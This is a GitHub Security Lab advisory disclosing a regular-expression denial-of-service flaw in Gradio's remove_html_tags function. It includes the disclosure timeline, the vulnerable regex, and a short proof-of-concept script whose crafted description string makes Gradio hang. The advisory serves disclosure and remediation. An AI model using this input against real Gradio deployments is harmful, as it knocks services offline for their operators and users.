GHSL-2024-273: ReDoS in remove_html_tags of Gradio

Coordinated Disclosure Timeline

• 2024-10-07: Reported via PVR: https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m
• 2025-01-09: Asked for an update.
• 2025-01-15: No response on https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m, so I posted a public PR with the fix: https://github.com/gradio-app/gradio/pull/10368

Summary

remove_html_tags uses a regex that has a ReDoS vulnerability.

Project

gradio

Tested Version

website@0.39.1

Details

ReDoS in remove_html_tags (GHSL-2024-273)

The HTML_TAG_RE regex, which is used by remove_html_tags contains a ReDoS vulnerability:

HTML_TAG_RE = re.compile("<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)

Proof of concept:

If you start gradio like this, it gets stuck in a very long running loop:

import gradio as gr

def greet(name, intensity):
    return "Hello " * intensity + name + "!"

demo = gr.Interface(
    fn=greet,
    inputs=["text", "slider"],
    outputs=["text"],
    description = "<" + "\n" * 100
)

demo.launch()

It is possible that this vulnerability may lead to DoS in Gradio playground using specially crafted code.

This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.

Impact

This issue may lead to denial of service.

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-273 in any communication regarding this issue.